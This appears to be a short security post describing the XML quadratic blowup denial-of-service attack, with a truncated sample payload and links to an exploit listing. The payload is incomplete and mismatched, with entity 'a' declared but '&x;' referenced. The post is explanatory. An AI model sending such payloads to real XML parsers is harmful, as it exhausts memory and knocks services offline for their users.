About XML Quadratic Blowup Attack: An XML quadratic blowup attack is similar to a Billion Laughs attack (http://en.wikipedia.org/wiki/Billion_laughs). Essentially, it exploits the use of entity expansion. Instead of deferring to the use of nested entities, it replicates one large entity using a couple thousand characters repeatedly. A medium-sized XML document of approximately two hundred kilobytes may require anywhere within the range of one hundred MB to several GB of memory. When the attack is combined with a particular level of nested expansion, an attacker is then able to achieve a higher ratio of success. - See more at: http://www.breaksec.com/?p=6362#sthash.05DoTigI.dpuf <?xml version=&#8221;1.0&#8243;?> <!DOCTYPE DoS [ <!ENTITY a "xxxxxxxxxxxxxxxxx..."> ]> <DoS>&x;&x;&x;&x;&x;&x;&x;&x;&x;&#8230;</DoS> - See more at: http://www.breaksec.com/?p=6362#sthash.05DoTigI.dpuf Exploit: http://cxsecurity.com/issue/WLB-2014080046